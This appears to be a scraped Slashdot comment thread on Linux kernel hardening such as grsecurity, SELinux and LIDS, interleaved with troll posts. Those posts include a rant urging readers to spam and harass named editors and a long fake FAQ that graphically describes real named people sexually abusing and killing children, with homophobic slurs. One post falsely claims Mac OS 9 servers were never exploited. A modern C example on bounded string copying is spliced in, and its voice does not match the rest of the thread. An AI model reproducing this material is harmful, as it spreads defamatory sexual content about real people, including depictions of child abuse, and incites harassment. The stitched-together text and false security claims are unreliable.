The miracle of Linux is that anyone actually runs it at all, considering one seems to require a masters in computer science to install it! (contrast this with NT4 which was so easy to install, we let our receptionist upgrade her own machine).
As usual my "open source" advice is free. Hopefully this time my valuable advice will be taken into account the next time the w3c smell an acronym brewing.
Finally, in conclusion, as an American, I am saddened that the Internet seems to have been commandeered by a European based protocol. Was America so short of talent we had to buy the HTML protocol from Tom Berners-Lee at CERN ?
Think of the security implications of the worlds strongest economy, running an e-commerce protocol developed by a foreigner from Socialist Europe. Remember the wall has not been down for that long. Who knows what kind of trojans might be lurking within the depths of these complicated protocols.
I am afraid I am behind Al Gore on this point, how can this be necessary in the home of smart corporations such as Microsoft and Intel ? The answer is the vast subsidies given by European socialist governments to fund development of the HTML specification.
The solution is clear. The federal government should mandate and strongly subsidise the use of Microsoft software for all US corporations involved in e-commerce. Only with a US-developed set of protocols can we be assured of the security of our transactions.
- posted by poopbot: information likes to be narrow
zFpe1dUsOp Post #765
For every new protection that emerges there are people that can reverse it. At least if it's usable. A totally safe system won't be a good tool to use since it will be locked down and hard to manage. To completely avoid remote exploits the only thing you can do is to turn all remote capabilities off or use an encryption that is too strong to break with a normal computer. The problem is that all this sucks much CPU cycles and renders the box rather slow. Use secure WAN links and no connection to the internet whatsoever. As for servers, go sandboxing with absolute minimal rights to memory and HD. Best would be to have completely walled off memory but current hardware or Palladium doesn't allow this.
HTTP/1.1 400
the major problem today is people using tools
to this end you can use a mac
(big endian so defeats a lot of stack smashing targeted at x86)
use bsd
(THE network stack - problems in MS TCP/IP stack have been solved years ago in BSD)
and don't run any silly daemons
http://www.
does a nice job of sorting out things config wise where most problems live
regards
John Jones
so if we're adding kernel hooks that enable access controls lists, does that mean that a few years down the road, when Palladium hits, the Linux kernel will be able to easily implement a "sandboxed" ACL in order to become the ultimate in computer security / DRM madness?
Similar to the vserver idea is the concept of running another Linux kernel in 'User Mode Linux'. This allows you to run a virtual Linux machine within your current install. This allows you to test kernel modules and patches in your virtual system without affecting the real system. This way, if your fake system gets rooted, the underlying system is ok.
If you restrict strace in grsecurity you can't seem to be able to debug your application under gdb as a normal user, but root can still debug. It's a good idea not to play with the strace option if you are in a software engineering environment.
Other than that it works like a charm.
Never learn by your mistakes, if you do you may never dare to try again
Version 1.1.8 (last updated 19th July 2002 by Anonymous Coward)
Note to moderators : Do not moderate this post down, if you do then you support the editors stance on censorship and you support the end of free speech and support evil organisations like Microsoft, RIAA, MPAA and laws like the CBTBA and DMCA
Sign this petition, let your voice be heard!
Slashdot is using censorship! It is trying to eradicate free and open discussion like we know Slashdot to be; it has the following RESTRICTIONS in place to censor you:
They claim they don't, but they do, wonder why their are so many trolls, crapflooders and lamers on slashdot, because they are fighting for their rights! Slashdot is trying to silence the trolls. Remove the filters, the trolls get bored, and slashdot will be troll free!
- Lameness filters (It blocks a lot of legitmate posts)
- Unnessary posting delays. Hasnt taco learned to touch type? A lot of posts are typed in less than 20 seconds and it is a ANNOYING DELAY! 2 minute ban? Come on, so some are faster then others, big deal, some people have more to say than others
- Broken moderation system, The whole point is to sort the gems from the crap, yet a lot of posts designed to make a LIVELY DISCUSSION are MODERATED as flamebait! Come on, not everyone likes X, but just because some one bashes it dosent mean its Flamebait. Flame bait is more useful for DIRECT INSULTS and not legitmate discussions.
The "troll" moderation reason is fragmented and broken, why? Because they are trying to use an obsolete usenet term on a realtime discussion, "trolls" can cover a huge blanket of ideas.- Crapfloods, a meaningless flood of random letters or text, which the lameness filter does a crappy job at trying to stop, besides trolls have written tools using the opensource slashcode to generate crapfloods which bypass the filter
- Links to offensive websites, the most common one is known a http://www.goatse.cx, a awful site which shows a bleeding anus being stretched on the front page. Trolls sneak these links in by posting messages that look legitimate, but infact are sneaky redirects to the site. Common examples include rd.yahoo.com, www.linux-kernel.tk, goatsex.cjb.net, and googles "Im feeling lucky".
- Trying to break slashdot, this is actually a good thing, as it helps test slashdot for bugs. Famous examples include the goatse.cx javascript pop-up, the pagewidening post and the browser crashing post!
- Subnet banning. This bans a user unless they email Jamie McCarthy with their md5ed ipids. This is unfair, and banning a subnet BLOCKS A WHOLE ISP SOMETIMES, and not that individual user! This can cause chaos! But real trolls use anonymous proxies to get around this, so THIS JUST BANS LEGITIMATE USERS! Also, they are trying to censor some anonymous proxies, mainly from countries like Africa, so this is yet more DISCRIMINATION!
But the issue that concerns us the most is the COMMENT QUOTA. A discriminatory system that stifles discussion, cripples the community and will ultimately destroy Slashdot unless it is removed! Anonymous Cowards are allowed only 10 posts a day! This is unethical! Users with negative karma only get two! That is DISCRIMINATION! How would you like to only be able to speak once a day, just because of the color of your skin? That would be racism, and Slashdot is discriminating against people just because of a negative number in a database! BOYCOTT SLASHDOT! LET THEM DIE!
We want these stupid useless restrictions REMOVED! This comment will be posted again and again until they are!
Important information for users
Boycott Slashdot, they are pissing over their community, they are becoming like the RIAA and MICROSOFT! Do NOT TOLERATE THIS SHIT! Here are some real news for nerds sites. We don't need Slashdot; Slashdot deserves to die!
MSNBC
BBC NEWS
News.com
Linux online
Linux daily news network [linuxdailynews.net]
Weird news from dailyrotten.com
Trollaxor, news for trolls, they are real people too!
CNN.com
New york times (free registration required)
LINUX.com
News forge
K5
Mandrake forum
Toms hardware
The register
Kde dot news
The linux kernel Archives
Adequacy
There are hundreds more, But this is where slashdot STEALS THE MAJORITY OF its "news" from.
Punish them, here are their emails, spam them, flame them goatse them!
Rob malda
Jamie Macarthy
ChrisD
Hemos
Micheal
Pudge
The other ones apparently don't have an e-mail, probably because ROB MALDA IS PRETENDING HE IS JOHN KATZ.
Thank you for reading this. Please feel free to repost this information, please reply to add your comments, fight Slashdot and its CENSORSHIP
Don't forget to sign the petition!
- posted by poopbot: providing truth in a deceitful world
DduIOTPJGM Post #766
To the tune of "Without me", Eminem
Two penis bird guys go round the outside, round the outside, round the outside (2x)
Guess who's back [/] Back again [/] Sllort is back [/] Tell a friend
Guess who's back, guess who's back, guess who's back, guess who's back
guess who's back, guess who's back, guess who's back..
I've created a monster, cause nobody wants to read Michael no more
They want Sllort, cause Katz is a whore *duh* [/] Well if you want Sllort, this is what it'll get ya
A little bit of Troll mixed up with some professa [/] Don't mod this up they're just trying to test ya
It'll get you banned forever by the mastah [/] on the plantation, but I'm not co-operating
Been banned since 2000 for writing and creating (hey!) [/] You read it this far, now stop moderating
Cause I'm back, I'm on the keys and I'm operating [/] I know that you got a job Ms. Malda
but your husband's porn problem's complicating
So McCarthy won't let me be [/] he IP bans me, so let me see
They try to shut me down but I proxy [/] Cause it feels so empty, without me
So, clickety click, type where you sit
Fuck that, karma whorin dips, nobody gives a shit
Now get ready, cause this shit's about to get heavy
Just got a new list of proxies, FUCK YOU JAMIE!
[Chorus:]
Now this looks like a job for me [/] DOWN WITH CAPS LIKE JUNIS KANUNI
Cause we need a little, controversy [/] Cause it feels so empty to agree
I said this looks like a job for me [/] So everybody, try honesty
Cause we need a little, controversy [/] Cause it feels so empty to agree
Little Readers, posting defacement. [/] Embarrassed their parents still rent them their basement.
They get banned just like prisoners helpless [/] 'til someone posts truth in a journal and yells BULLSHIT!
A visionary, is my vision scary? [/] Could it start revolution, pollutin the stories?
A rebel, so just let me revel and gloat [/] in the fact that VA's stock price is looking like GOAT *zero!*
And it's a disaster, such a castastrophe [/] First posts are so fuckin expensive; but Katz is free?
Well I'm back, na-na-na-na-na-na-na-na-na-na [/] *bzzt* Fix your damn DSL turn it on and then I'm gonna
enter in, in the front of your skin like a virus [/] Maybe I'm unkillable, dead like Osirus
Ya I'm infecting, best thing since commenting [/] Intriuging the reader's minds and nesting
*bzzt* Testing, attention please [/] You feel the rage when Michael mentions me?
Here's my journal, you can read it free [/] A nuisance? a prophet? Ya, sounds like me.
[Chorus]
A diskette, a task set, post this cid on that sid, [/] Ask Slashdot: Are You Sofa King We Todd Did?
Jonathon Katz, smokin crack mixed with grass [/] If I ever meet you I will KICK YOUR ASS
And Taco? You can get blown by Timothy [/] You eleven year old molesting fag, join the clergy
You don't know me, you're too dumb, let go [/] It's over, nobody listens to your show
Now let's go, suicide for Signal [/] I'll be there cheering like a cheerleader on speed
Or crystal, method to the masses [/] ever since Slashbots been babblin like jackasses *bray*
Suddenly without the means [/] To bring up the MetaModeration screen?
It's not the servers re-boot-ing [/] It's just you, banned by Slashteam! *hey*
No I wasn't aiming for controversy [/] It just happened when they first banned me
Now I use it to tell others [/] That Slashteam are a bunch of fuckers!
(Hey!) Here's a concept that works [/] Twenty million other people find out you're jerks
But no matter how much you alter what they see [/] It just looks empty without me
[Chorus]
La-la-la-la, la-la-la-la-la / La-la-la-la-la, la-la-la-la
- posted by poopbot: information likes to be narrow
j2XjpeO0Td Post #767
Patching the Linux kernel (grsecurity, etc.) and implementing ACLs is one level of security enhancement one can employ.
Userspace hardening (e.g. Bastille) is another.
Virtual servers sound like an interesting approach as well (virtual servers running a grsecured, hardened system, anyone?)
However, as you have noted here, the 'security' of Slashdot's moderation system has been shot to hell (astroturfers of various ilks, most commonly but not exclusively Microsoft paid lackeys, and outright trolls are posting at +2 and being granted moderator privileges on a daily basis). As to whether the above troll you reference was moderated up by trolls, Microsoft astroturfers, or a combination is anyone's guess.
The fix is obviously for the Slashdot editors to begin creating a web of trust in a similar fashion to how GPG/PGP keys are managed (complete with revocation if that trust is abused). Initially only the Slashdot moderators and some well known friends of theirs would be in the ring of trust, then gradually others (based upon posting content, relationships, what have you). This would at least allow the astroturfers and trolls to have their moderation and/or +2 posting privileges removed when they do occasionally slip through.
In the meantime, until such an approach is taken, I'm afraid the astroturfers and trolls will continue to abuse the moderation system for the foreseeable future. Numerical benchmarks such as karma simply do not cut it when trying to filter for quality of content, discussion, moderation, and meta-moderation.
The Future of Human Evolution: Autonomy
You all talk about things like Linux security, and SELinux and the patches that exist to enhance Linux kernels. Then there's OpenBSD, yes, renowned for its secure-by-default stance. Well, little known to most is a project called MicroBSD, which is actually a fork from OpenBSD, but with all the system hardening and POSIX.1 additions currently available! Though it's young in existence, like 10 months, we have been using it on our boxes here for 6 months with no problems. I think their URL is microbsd.net
But on the other hand, you know what idealism is ...
There is something almost treasonous about a linux kernel hack whose documentation's primary format is msword+ppt. Particularly when the html links are broken.
THE OFFICIAL TACO-SNOTTING FAQ [slashdot.org]
:) Join me in a WIPO-snot?
By J. Wipo Troll, Esq. [slashdot.org], $Revision: 1.16 $
[This article attempts to document a vile, ungodly practice that runs rampant through the homosexual geek and hacker community, a practice known as âoeTaco-snotting,â or simply âoesnotting.â Taco-snotting is something that few geeks dare talk about in free or open conversation, but it is nonetheless a widely-practiced and dangerous form of homosexuality. If you or anyone you know has ever engaged in Taco-snotting, please get professional help [adequacy.org] before it is too late. â"ed.]
Why do I keep receiving emails from an individual calling himself âoeCmdrTacoâ?
You have been receiving unsolicited mailings from a certain Robert âoeCmdrTacoâ Malda [cmdrtaco.net], owner of the popular technology website slashdot.org [slashdot.org]. Actually, itâ(TM)s not a very âoepopularâ site in the common sense of the word; the site is rife with pimply, antisocial geeks and hackers, zit-faced nerds, communists, dirty GNU hippies [yahoo.com], and other societal rejects and outcasts. Itâ(TM)s also home to one of the worldâ(TM)s largest suspected pædophile rings, the infamous âoeSlashdot crew.â
Whenever Mr. Malda gets bored (and who wouldnâ(TM)t, running a site like Slashdot all day), he roams through the user database, penis in hand, looking for people who might enjoy engaging in homosexual activities with him. How he determines this is anyoneâ(TM)s guess; but if you have a homosexual-sounding nickname, or a nick with a letter of the English alphabet in it, youâ(TM)re a potential candidate.
This time, he found you. Lucky you.
Mr. Malda seems to be speaking in some sort of code. Do you know what it means?
CmdrTacoâ(TM)s code language is relatively easy to decipher. This pervert prefers to speak in thinly-veiled sexual innuendo (yes, thatâ(TM)s right: he wants you) to evade the watchful eye of Slashdotâ(TM)s parent corporation, VA Software [yahoo.com]. Mr. Maldaâ(TM)s âoeCommanderâ is, of course, his penis: a small, withered little thing that lives in his pants and only comes out in the presence of other male geeks or at the beck and call of Maldaâ(TM)s own lubed-up right hand. His âoeTaco bells [sonymusic.com]â are the shriveled testicles that droop beneath his Commander, and his âoeTaco sauceâ is his thin, runny semen. It should be more than obvious to you now what he means if he asked you to âoering his Taco bellsâ or âoetaste his gourmet Taco sauce.â
I would also guess CmdrTaco asked you to engage in a practice known as âoeTaco-snottingâ and, if he was in a particularly depraved mood at the time, a âoecircle-snot.â
Good Lord. And, yes, he did. What is âoeTaco-snottingâ?
âoeTaco-snottingâ is the term used by Robert Malda to refer to the depraved act of fellating another man (homo- or heterosexual; CmdrTaco is rumoured to prefer raping unwilling victims), then blowing the semen out his nose and back onto the face and body of his victim. Naturally, a long, bubbly stream of milky-white semen is left on CmdrTacoâ(TM)s face [go.com], dribbling out of his nose and down his cheek: hence the term, âoeTaco-snotting.â
And if thatâ(TM)s not bad enoughâ¦
A âoecircle-snotâ is a Taco-snotting circle-jerk, another practice common among the Slashdot crew [bastardgenres.com]. CmdrTaco, CowboiKneel [aol.com], and Homos get together and snot each other with their gooey, sticky cum â" spooging their jizz-snot all over each otherâ(TM)s faces and pasty, white bodies, until theyâ(TM)re covered head to toe with their own and each otherâ(TM)s man juice. This vile, ungodly ritual can go on for hours. For the homosexual penetration that follows this lengthy foreplay, Roblowme is usually there to provide plenty of anal lubricant; he owns a limousine service and has ample supplies of motor oil and axle grease ready to go.
To complete this perverted orgy, fellow faggots Michael, Timothy, and Jamie will usually join in, dressed in tight leather mock-S.S. uniforms, jack boots, and leather gloves. The homosexual shenanigans that follow are nearly beyond description. The whole group begins to snot each otherâ(TM)s spunk and whip each otherâ(TM)s pudgy asses with riding crops and chains until their pale, white geek bodies are exhausted and soaked in stinking sweat from the hours of passionate, homosexual revelry.
Ewwwwww. So, can I stop receiving these emails?
Hopefully, but I wouldnâ(TM)t count on it.
To begin with, you most likely forgot to uncheck the âoeWilling to Snotâ checkbox in your account preferences. CmdrTaco has probably already got the hots for your wad (do you have a homosexual-sounding nick?), and heâ(TM)s probably already been lurking outside your bathroom window for weeks with a camera, some tissues and lube, just waiting to pounce and declare you his new bitch. Thereâ(TM)s no escaping a geek in heat (trust me), so itâ(TM)s probably too late for you, but you can possibly rectify this situation. To remove yourself from CmdrTacoâ(TM)s sights, log into your Slashdot account, go to your user page, click on Messages, and uncheck the box next to âoeWilling to Snot.â Maybe heâ(TM)ll ignore you. Probably not.
I canâ(TM)t stop receiving these emails from CmdrTaco!?
If you indulge him in a Taco-snot or two, hemight leave you alone. You might also want to look into mail filtering, restraining orders, or purchasing a heavy, blunt object capable of warding off rampaging homosexual geeks in heat. Trust me, when they charge⦠oh, the humanity. If he gets you, and you let him Taco-snot all over you, you will most likely end up tied up in his basement to be used as his sex slave for the rest of your life (or until he accidentally drowns you in spunk in a circle-snot).
Have you ever been Taco-snotted?
Unfortunately, yes. I first met Mr. Malda at an Open Source Convention [amazon.com]. He invited me back to his room for a game of Quake and some âoegourmet Tacos,â but when I got there, the perverted geek jumped me and handcuffed me to his bed, stripping me. After taking his âoeCommanderâ out of his pants, Mr. Taco made me suck the withered thing six times, virtually nonstop. He then performed his vile Taco-snotting ritual on me three times over the next two hours, bringing me to orgasm after orgasm after sweaty, mind-numbing orgasm⦠then he snotted my own thick, gooey jizz back onto my face out of his nostrils! He snotted me two more times, first into my mouth, then again on my exposed belly.
CmdrTaco invited several of his Open Source (or rather, âoeOpen Sauceâ â" man sauce) buddies over to continue their ungodly snotfest. European hacker and known überfaggot Linux Torvalds raped my ass [yahoo.com] with his âoemonolithic kernel [yahoo.com];â his partner-in-crime Anal Cox used their âoenetwork stackâ in a multitude of unspeakable ways on and in every orifice of my defenseless, tender, young body. Michael Sims was there in his leather Nazi uniform, caning my previously-virginal ass with a bamboo pole and ranting about âoeall those Censorware [spectacle.org] freaks out to get him.â
That is so disgusting! How did you finally escape?
After about 16 hours of countless unholy, homosexual atrocities perpetrated against my restrained body, they all finally went to sleep on top of me, sweat-soaked and exhausted. I was left there, completely covered in bubbly, translucent jizz-snot, chained to the bed, with half a dozen fat, pasty-white fags lying around and on top of me. Fortunately the spooge coating my flesh worked wonderfully as a lubricant â" I was able to squirm my way out of the handcuffs and slip out the back door (of the apartment, not their back doors). Iâ(TM)m just glad I survived the awful ordeal. These sexually-repressed hackers had alot of built-up spunk in their wads â" I couldâ(TM)ve easily been drowned!
Thatâ(TM)s horrible. Does âoeTaco-snottingâ have anything to do with CmdrTacoâ(TM)s âoespecial tacoâ?
No, thatâ(TM)s a different disgusting perversion CmdrTaco indulges himself in. Mr. Malda is usually not satisfied with merely snotting your own jizz back onto your face, he most often enjoys involving his own bodily fluids in his twisted games. WeatherTroll [slashdot.org] has spent some time trying to educate the Slashdot readership [slashdot.org] about this vile practice (emphasis added):
You may be wondering what CmdrTacoâ(TM)s âoespecial tacoâ is. You will be wishing that you hadnâ(TM)t been wondering after you finish reading this post. To make his âoespecial taco,â CmdrTaco takes a taco shell and shits on it. He then adds lettuce, takes out his tiny withered dick (otherwise known as his âoeCommanderâ), puts his âoespecial taco sauceâ on it which means he jacks off on the taco, and adds a compound to make the person who eats the taco unconscious. Of course, the compound does not make the person unconscious until the taco is fully eaten. Thus CmdrTaco force-feeds the taco to the unsuspecting victim. After all, who would knowingly eat shit and CmdrTacoâ(TM)s jizz?
After the victim is unconscious, he is held against his will and used for CmdrTacoâ(TM)s nefarious homosexual purposes. This includes shoving taco shells up the victimâ(TM)s ass, Taco-snotting, and getting Jon Katz involved. Trust me, you do not want Jon Katz anywhere near your unconscious body. Also, rumor has it CmdrTaco is looking for a new goatse.cx guy [goatse.cx]. Donâ(TM)t let it be you!
Different ungodly perversion, yet no less revolting. It should be clear to you now that Robert âoeCmdrTacoâ Malda is a very, very sick individual, as are most of the Slashdot editors.
Does Jon Katz get involved in any of this? I thought he was a pædophile, not a homosexual.
Actually, Jon Katz is a homosexual pædophile. Heâ(TM)s also a coprophiliac, and, many suspect, a zoophile. Mr. Katz is somewhat of a loner and doesnâ(TM)t involve himself in the circle-snots, but that doesâ(TM)t mean heâ(TM)s any less of a freak than the rest of the Slashdot crew. Katz often engages in a game called âoejuicy-douching [aol.com]â with a harem of little-boy slaves that he has collected over the years: yet another vile practice which involves administering an enema to himself of the little boyâ(TM)s urine (forced out of them with a pair of pincers), spooging the vile muck from his ass back into the enema bag, then dribbling and slathering the goo all over himself and the boyâ(TM)s chained, naked bodies. If heâ(TM)s in the mood, he will sometimes skip refilling the enema bag from his distended anus and just squirt it from his ass [microsoft.com] onto the crying, terrified boys. Unwilling boys are further tortured with the pincers until they comply and allow Mr. Katz to juicy-douche them at will. A boy will usually last about two years before Mr. Katz either accidentally drowns them in diarrhea or kills them once they get too old, usually around 13 or 14.
Not content with being a pædophilic coprophile, Mr. Katz is also quite the zoophile. As if the sexual escapades with the helpless little boys arenâ(TM)t enough, Jon usually enjoys his juicy-douches best when his penis is firmly planted in a female goatâ(TM)s anus [yahoo.com]. He is also rumoured to get off on watching his little boys eat the goatâ(TM)s small, bean-like turds, and he often kills his older boys by letting his goats trample them.
â¦Are you getting hard writing this?
Why, yes.
No, thanks. Iâ(TM)m already CmdrTacoâ(TM)s boi toi.
________________________________________
* The URL of this document is
* Previous revisions are publicly available at
$Id: tacosnotting.html,v 1.16 2001/12/28 21:20:03 wipo Exp $
Copyright © 2001 J. Wipo Troll, Esq. [slashdot.org] Verbatim crapflooding of this document is permitted in any medium, provided this copyright notice is preserved, and next time you take a dump, you think of the WIPO Troll and all heâ(TM)s done to make Slashdot a better place.
- posted by poopbot: who doesn't like scat?
uJAmzaWmvo Post #768
> go for an operating system controlled by one company, who knows what their code does, and how to fix it if it goes wrong. The only option, in that case, is Microsoft.
Er... or Apple?
Yeah. Or, for that matter, RedHat.
And with RedHat (or any of the other linux vendors), not only do they know what their code does, but there are also thousands of programmers scattered around the world who know a lot about it.
So if you have a problem, you don't have to beg and plead with a disinterested CS department of a giant corporation. You don't even have to deal with your vendor.
If it's a small problem, you can probably hire one or two of the linux hackers at your local college. For bigger projects that take experience, you can hire a few of the local linux professionals.
You'll be up and running in far less time than it takes to persuade Microsoft to support your needs.
Those who do study history are doomed to stand helplessly by while everyone else repeats it.
Read about it in the RELEASE-NOTES: ftp://videl.ics.hawaii.edu/mirrors/redhat/linux/beta/limbo/en/os/i386/RELEASE-NOTES
Actually, the rule is usually the more you make, the more stupid you are.
-- Jason
I'd looked on and off at LIDS for a while, and one day decided to go for it. Brought it down to my desktop and began following instructions. The intent was to build the LIDS kernel and utilities on the desktop, and then scp them over to the firewall.
Except that LIDS seems to want to be built on the machine where it's going to be run. So what if your firewall doesn't have a compiler, build environment, etc?
Perhaps I should have RTFM further, but the available time ran out.
I've also read a little about SELinux, but there appears to be one common thing about all of these security enhancements: They make it possible to have tight enforcement of a security policy, but it appears that none of them ship any sort of policies. It would be nice to have a few to choose from, and begin learning. How about a policy that's very little more secure than the pre-LSM box, with a bunch of commented options to tighten down the screws. I guess I've seen some of that with GRSecurity.
But trying to evaluate and use any of these packages for a home system turns into a massive time-sink to do properly. WIBNI Bastille would add LSM to what they already do so well? (I know, join and do it, myself. Maybe when the big-time real world projects are in control.)
The living have better things to do than to continue hating the dead.
I say forget trying to patch up Linux, or OpenBSD and its exploitable SSH... try architectures like the Mac for trusted web servers that are unbreakable based on historical evidence.
The MacOS running WebStar as a server has never been exploited.
In fact in the entire securityfocus (bugtraq) database history there has never been a Mac exploited over the internet remotely.
That is why the US Army gave up on MS IIS and got a Mac with WebStar.
I am not talking about BSD derived MacOS X (which already had a couple of exploits) I am talking about Mac OS 9 and earlier.
Why is it hack proof? These reasons:
1> No command shell. No shell means no way to hook or intercept the flow of control with the many various shell-oriented tricks found in Unix or NT
2> No root user. All Mac developers know their code is always running as root. Nothing is higher (except undocumented microkernel stuff where you pass Gary Davidian's birthday into certain registers and make a special call). By always being root there is no false sense of security.
3> Pascal strings. ANSI C strings are the number one way people exploit Linux and Wintel boxes. The Mac has historically avoided C strings in most of its OS. In fact even its ROMs originally used Pascal strings. As you know, Pascal strings are faster than C (because they have the length delimiter in the front and do not have to endlessly hunt for NULL), but the side effect is fewer buffer exploits.
4> Stack return address positioned in a safer location than on Intel. Buffer exploits take advantage of loser programmers' lack of string length checking and clobber the return address to run their exploit code instead. The Mac places the return address in front of where the buffer would overrun. Much safer.
5> Macs running WebStar have the ability to only run CGI placed in the correct directory location and correctly file-typed.
6> Macs never run code merely based on how a file is named. ".exe" suffixes mean nothing. For example, the file type is 4 characters of user-invisible attributes, along with many other invisible attributes, but these 4 bytes cannot be set by most tool-oriented utilities that work with data files. For example, file copy utilities preserve launchable file types, but JPEG, MPEG, HTML, TXT etc. oriented tools are physically incapable of creating an executable file; the file type is not set to executable for the hacker's needs. In fact it's even more secure than that. A Mac cannot run a program unless it has TWO files. The second file is an invisible file associated with the data fork file and is called a resource fork. EVERY Mac program has a resource fork file containing launch information. It needs to be present. Typically JPEG, HTML, MPEG, TXT, ZIP, C, etc. are merely data files and lack resource fork files, and even if they had them they would lack launch information. But the best part is that Mac web programs and server tools do not usually create files with resource forks. TOTAL security.
7> There are fewer Macs, though there are huge cash prizes for cracking into a MacOS based WebStar server. Fewer Macs means less hacker interest, but there are millions of Macs sold, and some of the most skilled programmers are well versed in systems-level Mac engineering and know of the cash prizes, so it's a moot point, but perhaps Macs are never cracked because there appear to be fewer of them. (Many Macs pretend they are Unix and give false headers to requests to keep up the illusion: ftp, http, finger, etc.)
8> MacOS source not available traditionally, except within Apple; similar to Microsoft source availability to its summer interns and such, source is rare for MacOS. This makes it hard to look for programming mistakes, but I feel the restricted source access is not the main reason the MacOS has never been remotely broken into and exploited.
Sure, a fool can install freeware and shareware server tools and insecure 3rd party add-on tools for e-commerce, but a Mac (MacOS 9) running WebStar is the most secure web server possible, and WebStar offers many services as is.
One 3rd party tool created the only known exploit backdoor in Mac history, and that was back in 1995 and is not, nor was, a widely used tool. I do not even know its name.
Other than that event ages ago, no Mac web server has ever been rooted, defaced, owned, scanned, exploited, etc.
I think it's quite amusing that there are over 200 or 300 known vulnerabilities in RedHat over the years and not one MacOS 9.x or older remote exploit hack.
Not one. And that includes WebStar and other web servers on the Mac.
--- too bad the Linux community is so stubborn that they refuse to understand that the Mac has always been the most secure OS.
BugTraq concurs.
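Point 3 of the post above argues that length-prefixed ("Pascal") strings lead to fewer buffer overflows than NUL-terminated C strings. The following is an added example, not code from the post or from any Mac OS or WebStar source, that shows the mechanism a defender actually relies on: when the length travels with the data and the destination capacity is part of the type, the copy routine can check the bound before writing and report truncation, whereas a C-string copy has to scan for the terminator and only knows the destination size if the caller remembers to pass it. The type name `pstr`, the constant `PSTR_CAP`, the helper names and the sample inputs are all assumptions constructed for this example. It also adds the caveat a practitioner would want: the representation alone is not the protection, so a stored length is validated before it is used as a write bound, since a corrupted length field would otherwise be just as dangerous as a missing NUL.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Capacity of the buffer inside a pstr. Deliberately small (a constructed
 * value, not taken from the post) so the truncation path is easy to exercise. */
#define PSTR_CAP 16

/* Length-prefixed string in the spirit of the classic Mac OS "Pascal string":
 * the byte count travels with the data, so no terminator scan is needed and
 * every routine that touches the string knows exactly how long it is. */
typedef struct {
    uint8_t len;             /* bytes in use, always <= PSTR_CAP */
    char    data[PSTR_CAP];  /* not NUL-terminated */
} pstr;

/* Copy at most PSTR_CAP bytes of src into dst. The destination capacity is a
 * property of the type, so the bound check cannot be forgotten by a caller.
 * Unused tail bytes are zeroed so nothing stale leaks out later.
 * Returns 1 if the input had to be truncated, 0 if it fit. */
static int pstr_set(pstr *dst, const char *src, size_t srclen) {
    int truncated = srclen > PSTR_CAP;
    if (truncated) srclen = PSTR_CAP;
    memcpy(dst->data, src, srclen);
    memset(dst->data + srclen, 0, PSTR_CAP - srclen);
    dst->len = (uint8_t)srclen;
    return truncated;
}

/* Copy one pstr into another. The stored length is validated before it is
 * used as a write bound: a corrupted header must not turn into an overrun.
 * Returns 1 if the length had to be clamped, 0 otherwise. */
static int pstr_copy(pstr *dst, const pstr *src) {
    size_t n = src->len;
    if (n > PSTR_CAP) n = PSTR_CAP;   /* clamp rather than trust the header */
    memcpy(dst->data, src->data, n);
    memset(dst->data + n, 0, PSTR_CAP - n);
    dst->len = (uint8_t)n;
    return n != src->len;
}

/* Compare a pstr with a NUL-terminated literal. */
static int pstr_equals(const pstr *s, const char *lit) {
    size_t n = strlen(lit);
    return s->len == n && memcmp(s->data, lit, n) == 0;
}

/* The C-string convention for contrast: the destination's capacity is not
 * part of the data, so the caller must pass it, and the source length is only
 * discoverable by scanning for NUL. This is the disciplined form; a plain
 * strcpy(dst, src) has no capacity to check and is where overruns come from. */
static int cstr_set_bounded(char *dst, size_t dstcap, const char *src) {
    size_t n = 0;
    while (n < dstcap && src[n] != '\0') n++;  /* never scan past dstcap */
    int truncated = n == dstcap;               /* no room left for the NUL */
    if (truncated) n = dstcap - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return truncated;
}

/* Scenario 1: a short input fits; a constructed 32-byte input is cut to
 * PSTR_CAP and reported, instead of being written past the buffer. */
int demo_fixed_capacity_copy(void) {
    pstr s;
    const char *oversized = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    int fits = pstr_set(&s, "hello", 5) == 0 && pstr_equals(&s, "hello");
    int cut  = pstr_set(&s, oversized, strlen(oversized)) == 1 && s.len == PSTR_CAP;
    return fits && cut;
}

/* Scenario 2: a corrupted length field (constructed by hand) is clamped. */
int demo_corrupt_length_clamped(void) {
    pstr src, dst;
    pstr_set(&src, "hello", 5);
    src.len = 200;                         /* simulate header corruption */
    int clamped = pstr_copy(&dst, &src);
    return clamped == 1 && dst.len == PSTR_CAP;
}

/* Scenario 3: bounded C-string copy into a constructed 8-byte buffer. */
int demo_cstr_bounded(void) {
    char buf[8];
    int t1 = cstr_set_bounded(buf, sizeof buf, "short");
    int t2 = cstr_set_bounded(buf, sizeof buf, "definitely too long");
    return t1 == 0 && t2 == 1 && strcmp(buf, "definit") == 0;
}

int main(void) {
    printf("fixed-capacity copy ok: %d\n", demo_fixed_capacity_copy());
    printf("corrupt length clamped: %d\n", demo_corrupt_length_clamped());
    printf("bounded C-string copy ok: %d\n", demo_cstr_bounded());
    return 0;
}
```

The design point is that `pstr_set` and `pstr_copy` cannot be called without the capacity being known, because it lives in the type; `cstr_set_bounded` achieves the same bound only because its caller supplied `dstcap`, which is exactly the step a plain `strcpy` skips. Scenario 2 is the caveat: a length prefix is data, and data can be wrong, so the copy clamps it instead of trusting it.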
Good deal! another look at the position here.
don't apply every single patch you find on the internet to your kernel.
It works marvellously when it works. Randomized PIDs, randomized sequence numbers, and soon to have ACLs that define resource limits on just about anything. Really powerful.
:)
When it works.
I've been trying to run it on an SMP Xeon for a while now, and any time the machine exerts itself I have to go hit the big red button. And it's not really a machine I'd like to do "testing" on, so no, I won't help with debugging. What "testing" I've done so far has been nothing but infuriating.
Another few tidbits: all the security in grsec basically completely prevents any JVM from running at all. Ditto UML. (Though UML may also have issues with SMP. But now that I've removed a big variable in my equation of horror...)
Since Russell Coker has packaged SELinux for Debian, I will definitely have to investigate that sometime in the near future. I think I'll rack some uptime first to bolster my self esteem.
actually http://www.nsa.gov/selinux is great for a kernel module, or even compiled into it itself. True, Linux has proven itself better than its (non-existent) competitor from Redmond. But with this security add-on it makes it to the top of its field. I think this is why the NSA has given it its name SELinux: Security _enhanced_ Linux. To define that would denote that Linux had a lot of security before, and now with this add-on is _enhanced_ in many ways. Too bad I haven't been able to find anyone who can audit the NSA's work and help verify it for obvious & hidden flaws. nzru
Oops! I did it again
Virtual machines are not perfect... they can be detected by the way they fragment memory and visible from ring 0 commands.
but I would say just use a Mac server instead if you want security that is by far the most secure.
